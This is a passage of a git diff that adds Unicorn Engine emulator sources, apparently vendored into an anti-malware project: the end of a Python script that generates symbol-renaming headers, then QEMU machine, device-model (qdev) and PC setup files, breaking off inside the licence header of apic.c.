'helper_cmpabs_d_nge', + 'helper_cmp_d_le', + 'helper_cmpabs_d_le', + 'helper_cmp_d_ngt', + 'helper_cmpabs_d_ngt', + 'helper_cmp_s_f', + 'helper_cmpabs_s_f', + 'helper_cmp_s_un', + 'helper_cmpabs_s_un', + 'helper_cmp_s_eq', + 'helper_cmpabs_s_eq', + 'helper_cmp_s_ueq', + 'helper_cmpabs_s_ueq', + 'helper_cmp_s_olt', + 'helper_cmpabs_s_olt', + 'helper_cmp_s_ult', + 'helper_cmpabs_s_ult', + 'helper_cmp_s_ole', + 'helper_cmpabs_s_ole', + 'helper_cmp_s_ule', + 'helper_cmpabs_s_ule', + 'helper_cmp_s_sf', + 'helper_cmpabs_s_sf', + 'helper_cmp_s_ngle', + 'helper_cmpabs_s_ngle', + 'helper_cmp_s_seq', + 'helper_cmpabs_s_seq', + 'helper_cmp_s_ngl', + 'helper_cmpabs_s_ngl', + 'helper_cmp_s_lt', + 'helper_cmpabs_s_lt', + 'helper_cmp_s_nge', + 'helper_cmpabs_s_nge', + 'helper_cmp_s_le', + 'helper_cmpabs_s_le', + 'helper_cmp_s_ngt', + 'helper_cmpabs_s_ngt', + 'helper_cmp_ps_f', + 'helper_cmpabs_ps_f', + 'helper_cmp_ps_un', + 'helper_cmpabs_ps_un', + 
'helper_cmp_ps_eq', + 'helper_cmpabs_ps_eq', + 'helper_cmp_ps_ueq', + 'helper_cmpabs_ps_ueq', + 'helper_cmp_ps_olt', + 'helper_cmpabs_ps_olt', + 'helper_cmp_ps_ult', + 'helper_cmpabs_ps_ult', + 'helper_cmp_ps_ole', + 'helper_cmpabs_ps_ole', + 'helper_cmp_ps_ule', + 'helper_cmpabs_ps_ule', + 'helper_cmp_ps_sf', + 'helper_cmpabs_ps_sf', + 'helper_cmp_ps_ngle', + 'helper_cmpabs_ps_ngle', + 'helper_cmp_ps_seq', + 'helper_cmpabs_ps_seq', + 'helper_cmp_ps_ngl', + 'helper_cmpabs_ps_ngl', + 'helper_cmp_ps_lt', + 'helper_cmpabs_ps_lt', + 'helper_cmp_ps_nge', + 'helper_cmpabs_ps_nge', + 'helper_cmp_ps_le', + 'helper_cmpabs_ps_le', + 'helper_cmp_ps_ngt', + 'helper_cmpabs_ps_ngt', + 'helper_r6_cmp_d_af', + 'helper_r6_cmp_d_un', + 'helper_r6_cmp_d_eq', + 'helper_r6_cmp_d_ueq', + 'helper_r6_cmp_d_lt', + 'helper_r6_cmp_d_ult', + 'helper_r6_cmp_d_le', + 'helper_r6_cmp_d_ule', + 'helper_r6_cmp_d_saf', + 'helper_r6_cmp_d_sun', + 'helper_r6_cmp_d_seq', + 'helper_r6_cmp_d_sueq', + 'helper_r6_cmp_d_slt', + 'helper_r6_cmp_d_sult', + 'helper_r6_cmp_d_sle', + 'helper_r6_cmp_d_sule', + 'helper_r6_cmp_d_or', + 'helper_r6_cmp_d_une', + 'helper_r6_cmp_d_ne', + 'helper_r6_cmp_d_sor', + 'helper_r6_cmp_d_sune', + 'helper_r6_cmp_d_sne', + 'helper_r6_cmp_s_af', + 'helper_r6_cmp_s_un', + 'helper_r6_cmp_s_eq', + 'helper_r6_cmp_s_ueq', + 'helper_r6_cmp_s_lt', + 'helper_r6_cmp_s_ult', + 'helper_r6_cmp_s_le', + 'helper_r6_cmp_s_ule', + 'helper_r6_cmp_s_saf', + 'helper_r6_cmp_s_sun', + 'helper_r6_cmp_s_seq', + 'helper_r6_cmp_s_sueq', + 'helper_r6_cmp_s_slt', + 'helper_r6_cmp_s_sult', + 'helper_r6_cmp_s_sle', + 'helper_r6_cmp_s_sule', + 'helper_r6_cmp_s_or', + 'helper_r6_cmp_s_une', + 'helper_r6_cmp_s_ne', + 'helper_r6_cmp_s_sor', + 'helper_r6_cmp_s_sune', + 'helper_r6_cmp_s_sne', + 'helper_msa_ld_df', + 'helper_msa_st_df', + 'no_mmu_map_address', + 'fixed_mmu_map_address', + 'r4k_map_address', + 'mips_cpu_get_phys_page_debug', + 'mips_cpu_handle_mmu_fault', + 'cpu_mips_translate_address', + 
'exception_resume_pc', + 'mips_cpu_do_interrupt', + 'mips_cpu_exec_interrupt', + 'r4k_invalidate_tlb', + 'helper_absq_s_ob', + 'helper_absq_s_qh', + 'helper_absq_s_pw', + 'helper_adduh_ob', + 'helper_adduh_r_ob', + 'helper_subuh_ob', + 'helper_subuh_r_ob', + 'helper_addq_pw', + 'helper_addq_qh', + 'helper_addq_s_pw', + 'helper_addq_s_qh', + 'helper_addu_ob', + 'helper_addu_qh', + 'helper_addu_s_ob', + 'helper_addu_s_qh', + 'helper_subq_pw', + 'helper_subq_qh', + 'helper_subq_s_pw', + 'helper_subq_s_qh', + 'helper_subu_ob', + 'helper_subu_qh', + 'helper_subu_s_ob', + 'helper_subu_s_qh', + 'helper_raddu_l_ob', + 'helper_precr_ob_qh', + 'helper_precr_sra_qh_pw', + 'helper_precr_sra_r_qh_pw', + 'helper_precrq_ob_qh', + 'helper_precrq_qh_pw', + 'helper_precrq_rs_qh_pw', + 'helper_precrq_pw_l', + 'helper_precrqu_s_ob_qh', + 'helper_preceq_pw_qhl', + 'helper_preceq_pw_qhr', + 'helper_preceq_pw_qhla', + 'helper_preceq_pw_qhra', + 'helper_precequ_qh_obl', + 'helper_precequ_qh_obr', + 'helper_precequ_qh_obla', + 'helper_precequ_qh_obra', + 'helper_preceu_qh_obl', + 'helper_preceu_qh_obr', + 'helper_preceu_qh_obla', + 'helper_preceu_qh_obra', + 'helper_shll_ob', + 'helper_shrl_ob', + 'helper_shra_ob', + 'helper_shra_r_ob', + 'helper_shll_qh', + 'helper_shll_s_qh', + 'helper_shrl_qh', + 'helper_shra_qh', + 'helper_shra_r_qh', + 'helper_shll_pw', + 'helper_shll_s_pw', + 'helper_shra_pw', + 'helper_shra_r_pw', + 'helper_muleu_s_qh_obl', + 'helper_muleu_s_qh_obr', + 'helper_mulq_rs_qh', + 'helper_muleq_s_pw_qhl', + 'helper_muleq_s_pw_qhr', + 'helper_mulsaq_s_w_qh', + 'helper_dpau_h_obl', + 'helper_dpau_h_obr', + 'helper_dpsu_h_obl', + 'helper_dpsu_h_obr', + 'helper_dpa_w_qh', + 'helper_dpaq_s_w_qh', + 'helper_dps_w_qh', + 'helper_dpsq_s_w_qh', + 'helper_dpaq_sa_l_pw', + 'helper_dpsq_sa_l_pw', + 'helper_mulsaq_s_l_pw', + 'helper_maq_s_w_qhll', + 'helper_maq_s_w_qhlr', + 'helper_maq_s_w_qhrl', + 'helper_maq_s_w_qhrr', + 'helper_maq_sa_w_qhll', + 'helper_maq_sa_w_qhlr', + 
'helper_maq_sa_w_qhrl', + 'helper_maq_sa_w_qhrr', + 'helper_maq_s_l_pwl', + 'helper_maq_s_l_pwr', + 'helper_dmadd', + 'helper_dmaddu', + 'helper_dmsub', + 'helper_dmsubu', + 'helper_dinsv', + 'helper_cmpgu_eq_ob', + 'helper_cmpgu_lt_ob', + 'helper_cmpgu_le_ob', + 'helper_cmpu_eq_ob', + 'helper_cmpu_lt_ob', + 'helper_cmpu_le_ob', + 'helper_cmp_eq_qh', + 'helper_cmp_lt_qh', + 'helper_cmp_le_qh', + 'helper_cmp_eq_pw', + 'helper_cmp_lt_pw', + 'helper_cmp_le_pw', + 'helper_cmpgdu_eq_ob', + 'helper_cmpgdu_lt_ob', + 'helper_cmpgdu_le_ob', + 'helper_pick_ob', + 'helper_pick_qh', + 'helper_pick_pw', + 'helper_packrl_pw', + 'helper_dextr_w', + 'helper_dextr_r_w', + 'helper_dextr_rs_w', + 'helper_dextr_l', + 'helper_dextr_r_l', + 'helper_dextr_rs_l', + 'helper_dextr_s_h', + 'helper_dextp', + 'helper_dextpdp', + 'helper_dshilo', + 'helper_dmthlip', + 'helper_dclo', + 'helper_dclz', + 'helper_dbitswap', + 'helper_lld', + 'helper_scd', + 'helper_sdl', + 'helper_sdr', + 'helper_ldm', + 'helper_sdm', + 'helper_dmfc0_tcrestart', + 'helper_dmfc0_tchalt', + 'helper_dmfc0_tccontext', + 'helper_dmfc0_tcschedule', + 'helper_dmfc0_tcschefback', + 'helper_dmfc0_lladdr', + 'helper_dmfc0_watchlo', + 'helper_dmtc0_entrylo0', + 'helper_dmtc0_entrylo1', + 'mips_reg_reset', + 'mips_reg_read', + 'mips_reg_write', + 'mips_tcg_init', + 'mips_cpu_list', + 'mips_release', + 'MIPS64_REGS_STORAGE_SIZE', + 'MIPS_REGS_STORAGE_SIZE' +) + +sparc_symbols = ( + 'cpu_sparc_exec', + 'helper_compute_psr', + 'helper_compute_C_icc', + 'cpu_sparc_init', + 'cpu_sparc_set_id', + 'sparc_cpu_register_types', + 'helper_fadds', + 'helper_faddd', + 'helper_faddq', + 'helper_fsubs', + 'helper_fsubd', + 'helper_fsubq', + 'helper_fmuls', + 'helper_fmuld', + 'helper_fmulq', + 'helper_fdivs', + 'helper_fdivd', + 'helper_fdivq', + 'helper_fsmuld', + 'helper_fdmulq', + 'helper_fnegs', + 'helper_fitos', + 'helper_fitod', + 'helper_fitoq', + 'helper_fdtos', + 'helper_fstod', + 'helper_fqtos', + 'helper_fstoq', + 'helper_fqtod', 
+ 'helper_fdtoq', + 'helper_fstoi', + 'helper_fdtoi', + 'helper_fqtoi', + 'helper_fabss', + 'helper_fsqrts', + 'helper_fsqrtd', + 'helper_fsqrtq', + 'helper_fcmps', + 'helper_fcmpd', + 'helper_fcmpes', + 'helper_fcmped', + 'helper_fcmpq', + 'helper_fcmpeq', + 'helper_ldfsr', + 'helper_debug', + 'helper_udiv_cc', + 'helper_sdiv_cc', + 'helper_taddcctv', + 'helper_tsubcctv', + 'sparc_cpu_do_interrupt', + 'helper_check_align', + 'helper_ld_asi', + 'helper_st_asi', + 'helper_cas_asi', + 'helper_ldqf', + 'helper_stqf', + 'sparc_cpu_unassigned_access', + 'sparc_cpu_do_unaligned_access', + 'sparc_cpu_handle_mmu_fault', + 'dump_mmu', + 'sparc_cpu_get_phys_page_debug', + 'sparc_reg_reset', + 'sparc_reg_read', + 'sparc_reg_write', + 'gen_intermediate_code_init', + 'cpu_set_cwp', + 'cpu_get_psr', + 'cpu_put_psr', + 'cpu_cwp_inc', + 'cpu_cwp_dec', + 'helper_save', + 'helper_restore') + + +if __name__ == '__main__': + arch = sys.argv[1] + + print("/* Autogen header for Unicorn Engine - DONOT MODIFY */") + print("#ifndef UNICORN_AUTOGEN_%s_H" %arch.upper()) + print("#define UNICORN_AUTOGEN_%s_H" %arch.upper()) + + for s in symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'arm' in arch: + for s in arm_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'aarch64' in arch: + for s in aarch64_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'mips' in arch: + for s in mips_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + if 'sparc' in arch: + for s in sparc_symbols: + print("#define %s %s_%s" %(s, s, arch)) + + print("#endif") + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/Makefile.objs new file mode 100644 index 0000000..08a0be1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/Makefile.objs @@ -0,0 +1,4 @@ +devices-dirs-$(CONFIG_SOFTMMU) += intc/ +devices-dirs-y += core/ +common-obj-y += $(devices-dirs-y) +obj-y += $(devices-dirs-y) diff --git 
a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/Makefile.objs new file mode 100644 index 0000000..9d40223 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/Makefile.objs @@ -0,0 +1,3 @@ +# core qdev-related obj files, also used by *-user: +common-obj-y += qdev.o +common-obj-$(CONFIG_SOFTMMU) += machine.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/machine.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/machine.c new file mode 100644 index 0000000..fa36062 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/machine.c @@ -0,0 +1,47 @@ +/* + * QEMU Machine + * + * Copyright (C) 2014 Red Hat Inc + * + * Authors: + * Marcel Apfelbaum <marcel.a@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + */ + +#include "hw/boards.h" + +static void machine_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void machine_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static const TypeInfo machine_info = { + TYPE_MACHINE, + TYPE_OBJECT, + + sizeof(MachineClass), + sizeof(MachineState), + NULL, + + machine_initfn, + NULL, + machine_finalize, + + NULL, + + NULL, + NULL, + NULL, + + true, +}; + +void machine_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &machine_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/qdev.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/qdev.c new file mode 100644 index 0000000..8b98f2a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/core/qdev.c @@ -0,0 +1,344 @@ +/* + * Dynamic device configuration and creation. 
+ * + * Copyright (c) 2009 CodeSourcery + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/* The theory here is that it should be possible to create a machine without + knowledge of specific devices. Historically board init routines have + passed a bunch of arguments to each device, requiring the board know + exactly which device it is dealing with. This file provides an abstract + API for device configuration and initialization. Devices will generally + inherit from a particular bus (e.g. PCI or I2C) rather than + this API directly. */ + +#include "hw/qdev.h" +#include "qapi/error.h" +#include "qapi/qmp/qerror.h" + + +static void bus_add_child(BusState *bus, DeviceState *child) +{ + char name[32]; + BusChild *kid = g_malloc0(sizeof(*kid)); + + kid->index = bus->max_index++; + kid->child = child; + object_ref(OBJECT(kid->child)); + + QTAILQ_INSERT_HEAD(&bus->children, kid, sibling); + + /* This transfers ownership of kid->child to the property. 
*/ + snprintf(name, sizeof(name), "child[%d]", kid->index); + object_property_add_link(OBJECT(bus), name, + object_get_typename(OBJECT(child)), + (Object **)&kid->child, + NULL, /* read-only property */ + 0, /* return ownership on prop deletion */ + NULL); +} + +void qdev_set_parent_bus(DeviceState *dev, BusState *bus) +{ + dev->parent_bus = bus; + object_ref(OBJECT(bus)); + bus_add_child(bus, dev); +} + +/* Create a new device. This only initializes the device state structure + and allows properties to be set. qdev_init should be called to + initialize the actual device emulation. */ +DeviceState *qdev_create(BusState *bus, const char *name) +{ + DeviceState *dev; + + dev = qdev_try_create(bus, name); + if (!dev) { + abort(); + } + + return dev; +} + +DeviceState *qdev_try_create(BusState *bus, const char *type) +{ +#if 0 + DeviceState *dev; + + if (object_class_by_name(NULL, type) == NULL) { // no need to fix. aq + return NULL; + } + dev = DEVICE(object_new(NULL, type)); // no need to fix. aq + if (!dev) { + return NULL; + } + + if (!bus) { + bus = sysbus_get_default(); + } + + qdev_set_parent_bus(dev, bus); + object_unref(OBJECT(dev)); + return dev; +#endif + return NULL; +} + +/* Initialize a device. Device properties should be set before calling + this function. IRQs and MMIO regions should be connected/mapped after + calling this function. + On failure, destroy the device and return negative value. + Return 0 on success. 
*/ +int qdev_init(DeviceState *dev) +{ + return 0; +} + +BusState *qdev_get_parent_bus(DeviceState *dev) +{ + return dev->parent_bus; +} + +static void qbus_realize(BusState *bus, DeviceState *parent, const char *name) +{ +} + +static void bus_unparent(struct uc_struct *uc, Object *obj) +{ + BusState *bus = BUS(uc, obj); + BusChild *kid; + + while ((kid = QTAILQ_FIRST(&bus->children)) != NULL) { + DeviceState *dev = kid->child; + object_unparent(uc, OBJECT(dev)); + } + if (bus->parent) { + QLIST_REMOVE(bus, sibling); + bus->parent->num_child_bus--; + bus->parent = NULL; + } +} + +void qbus_create_inplace(void *bus, size_t size, const char *typename, + DeviceState *parent, const char *name) +{ + object_initialize(NULL, bus, size, typename); // unused, so no need to fix. aq + qbus_realize(bus, parent, name); +} + +BusState *qbus_create(const char *typename, DeviceState *parent, const char *name) +{ + BusState *bus; + + bus = BUS(NULL, object_new(NULL, typename)); // no need to fix. aq + qbus_realize(bus, parent, name); + + return bus; +} + +static bool device_get_realized(struct uc_struct *uc, Object *obj, Error **errp) +{ + DeviceState *dev = DEVICE(uc, obj); + return dev->realized; +} + +static int device_set_realized(struct uc_struct *uc, Object *obj, bool value, Error **errp) +{ + DeviceState *dev = DEVICE(uc, obj); + DeviceClass *dc = DEVICE_GET_CLASS(uc, dev); + BusState *bus; + Error *local_err = NULL; + + if (dev->hotplugged && !dc->hotpluggable) { + error_set(errp, QERR_DEVICE_NO_HOTPLUG, object_get_typename(obj)); + return -1; + } + + if (value && !dev->realized) { +#if 0 + if (!obj->parent) { + static int unattached_count; + gchar *name = g_strdup_printf("device[%d]", unattached_count++); + + object_property_add_child(container_get(qdev_get_machine(), + "/unattached"), + name, obj, &error_abort); + g_free(name); + } +#endif + + if (dc->realize) { + if (dc->realize(uc, dev, &local_err)) + return -1; + } + + if (local_err != NULL) { + goto fail; + } + + if 
(local_err != NULL) { + goto post_realize_fail; + } + + QLIST_FOREACH(bus, &dev->child_bus, sibling) { + object_property_set_bool(uc, OBJECT(bus), true, "realized", + &local_err); + if (local_err != NULL) { + goto child_realize_fail; + } + } + if (dev->hotplugged) { + device_reset(dev); + } + dev->pending_deleted_event = false; + } else if (!value && dev->realized) { + Error **local_errp = NULL; + QLIST_FOREACH(bus, &dev->child_bus, sibling) { + local_errp = local_err ? NULL : &local_err; + object_property_set_bool(uc, OBJECT(bus), false, "realized", + local_errp); + } + if (dc->unrealize) { + local_errp = local_err ? NULL : &local_err; + dc->unrealize(dev, local_errp); + } + dev->pending_deleted_event = true; + } + + if (local_err != NULL) { + goto fail; + } + + dev->realized = value; + return 0; + +child_realize_fail: + QLIST_FOREACH(bus, &dev->child_bus, sibling) { + object_property_set_bool(uc, OBJECT(bus), false, "realized", + NULL); + } + +post_realize_fail: + if (dc->unrealize) { + dc->unrealize(dev, NULL); + } + +fail: + error_propagate(errp, local_err); + return -1; +} + +static void device_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + DeviceState *dev = DEVICE(uc, obj); + + dev->instance_id_alias = -1; + dev->realized = false; + + object_property_add_bool(uc, obj, "realized", + device_get_realized, device_set_realized, NULL); +} + +static void device_post_init(struct uc_struct *uc, Object *obj) +{ +} + +/* Unlink device from bus and free the structure. 
*/ +static void device_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void device_class_base_init(ObjectClass *class, void *data) +{ +} + + +static void device_class_init(struct uc_struct *uc, ObjectClass *class, void *data) +{ +} + +void device_reset(DeviceState *dev) +{ +} + +Object *qdev_get_machine(struct uc_struct *uc) +{ + return container_get(uc, object_get_root(uc), "/machine"); +} + +static const TypeInfo device_type_info = { + TYPE_DEVICE, + TYPE_OBJECT, + + sizeof(DeviceClass), + sizeof(DeviceState), + NULL, + + device_initfn, + device_post_init, + device_finalize, + + NULL, + + device_class_init, + device_class_base_init, + NULL, + + true, +}; + +static void qbus_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void bus_class_init(struct uc_struct *uc, ObjectClass *class, void *data) +{ + class->unparent = bus_unparent; +} + +static void qbus_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ + BusState *bus = BUS(uc, obj); + + g_free((char *)bus->name); +} + +static const TypeInfo bus_info = { + TYPE_BUS, + TYPE_OBJECT, + + sizeof(BusClass), + sizeof(BusState), + NULL, + + qbus_initfn, + NULL, + qbus_finalize, + + NULL, + + bus_class_init, + NULL, + NULL, + + true, +}; + +void qdev_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &bus_info); + type_register_static(uc, &device_type_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/Makefile.objs new file mode 100644 index 0000000..649888e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/Makefile.objs @@ -0,0 +1 @@ +obj-y += pc.o pc_piix.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc.c new file mode 100644 index 0000000..6377bee --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc.c @@ -0,0 +1,181 @@ +/* + * QEMU 
PC System Emulator + * + * Copyright (c) 2003-2004 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "hw/hw.h" +#include "hw/i386/pc.h" +#include "sysemu/sysemu.h" +#include "qapi-visit.h" + + +/* XXX: add IGNNE support */ +void cpu_set_ferr(CPUX86State *s) +{ +// qemu_irq_raise(ferr_irq); +} + +/* TSC handling */ +uint64_t cpu_get_tsc(CPUX86State *env) +{ + return cpu_get_ticks(); +} + +/* SMM support */ + +static cpu_set_smm_t smm_set; +static void *smm_arg; + +void cpu_smm_register(cpu_set_smm_t callback, void *arg) +{ + assert(smm_set == NULL); + assert(smm_arg == NULL); + smm_set = callback; + smm_arg = arg; +} + +void cpu_smm_update(CPUX86State *env) +{ + struct uc_struct *uc = x86_env_get_cpu(env)->parent_obj.uc; + + if (smm_set && smm_arg && CPU(x86_env_get_cpu(env)) == uc->cpu) { + smm_set(!!(env->hflags & HF_SMM_MASK), smm_arg); + } +} + +/* IRQ handling */ +int cpu_get_pic_interrupt(CPUX86State *env) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int intno; + + intno = apic_get_interrupt(cpu->apic_state); + if (intno >= 0) { + return intno; + } + /* read the irq from the PIC */ + if (!apic_accept_pic_intr(cpu->apic_state)) { + return -1; + } + + return 0; +} + +DeviceState *cpu_get_current_apic(struct uc_struct *uc) +{ + if (uc->current_cpu) { + X86CPU *cpu = X86_CPU(uc, uc->current_cpu); + return cpu->apic_state; + } else { + return NULL; + } +} + +static X86CPU *pc_new_cpu(struct uc_struct *uc, const char *cpu_model, int64_t apic_id, + Error **errp) +{ + X86CPU *cpu; + Error *local_err = NULL; + + cpu = cpu_x86_create(uc, cpu_model, &local_err); + if (local_err != NULL) { + error_propagate(errp, local_err); + return NULL; + } + + object_property_set_int(uc, OBJECT(cpu), apic_id, "apic-id", &local_err); + object_property_set_bool(uc, OBJECT(cpu), true, "realized", &local_err); + + if (local_err) { + error_propagate(errp, local_err); + object_unref(uc, OBJECT(cpu)); + cpu = NULL; + } + return cpu; +} + +int pc_cpus_init(struct uc_struct *uc, const char *cpu_model) +{ + int i; + 
Error *error = NULL; + + /* init CPUs */ + if (cpu_model == NULL) { +#ifdef TARGET_X86_64 + cpu_model = "qemu64"; +#else + cpu_model = "qemu32"; +#endif + } + + for (i = 0; i < smp_cpus; i++) { + uc->cpu = (CPUState *)pc_new_cpu(uc, cpu_model, x86_cpu_apic_id_from_index(i), &error); + if (error) { + //error_report("%s", error_get_pretty(error)); + error_free(error); + return -1; + } + } + + return 0; +} + +static void pc_machine_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ +} + +static void pc_machine_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ +} + +static const TypeInfo pc_machine_info = { + TYPE_PC_MACHINE, + TYPE_MACHINE, + + sizeof(PCMachineClass), + sizeof(PCMachineState), + NULL, + + pc_machine_initfn, + NULL, + NULL, + + NULL, + + pc_machine_class_init, + NULL, + NULL, + + true, + + NULL, + NULL, + + // should this be added somehow? + //.interfaces = (InterfaceInfo[]) { { } }, +}; + +void pc_machine_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &pc_machine_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc_piix.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc_piix.c new file mode 100644 index 0000000..a5ea862 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/i386/pc_piix.c @@ -0,0 +1,78 @@ +/* + * QEMU PC System Emulator + * + * Copyright (c) 2003-2004 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the 
Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "hw/i386/pc.h" +#include "hw/boards.h" +#include "exec/address-spaces.h" +#include "uc_priv.h" + + +/* Make sure that guest addresses aligned at 1Gbyte boundaries get mapped to + * host addresses aligned at 1Gbyte boundaries. This way we can use 1GByte + * pages in the host. + */ +#define GIGABYTE_ALIGN true + +/* PC hardware initialisation */ +static int pc_init1(struct uc_struct *uc, MachineState *machine) +{ + return pc_cpus_init(uc, machine->cpu_model); +} + +static int pc_init_pci(struct uc_struct *uc, MachineState *machine) +{ + return pc_init1(uc, machine); +} + +static QEMUMachine pc_i440fx_machine_v2_2 = { + "pc_piix", + "pc-i440fx-2.2", + pc_init_pci, + NULL, + 255, + 1, + UC_ARCH_X86, // X86 +}; + +static void pc_generic_machine_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + MachineClass *mc = MACHINE_CLASS(uc, oc); + QEMUMachine *qm = data; + + mc->family = qm->family; + mc->name = qm->name; + mc->init = qm->init; + mc->reset = qm->reset; + mc->max_cpus = qm->max_cpus; + mc->is_default = qm->is_default; + mc->arch = qm->arch; +} + +void pc_machine_init(struct uc_struct *uc); +void pc_machine_init(struct uc_struct *uc) +{ + qemu_register_machine(uc, &pc_i440fx_machine_v2_2, + TYPE_PC_MACHINE, pc_generic_machine_class_init); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/Makefile.objs 
b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/Makefile.objs new file mode 100644 index 0000000..7de05c6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/Makefile.objs @@ -0,0 +1 @@ +obj-$(CONFIG_APIC) += apic.o apic_common.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic.c b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic.c new file mode 100644 index 0000000..957a66e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/hw/intc/apic.c @@ -0,0 +1,230 @@ +/* + * APIC support + * + * Copyright (c) 2004-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
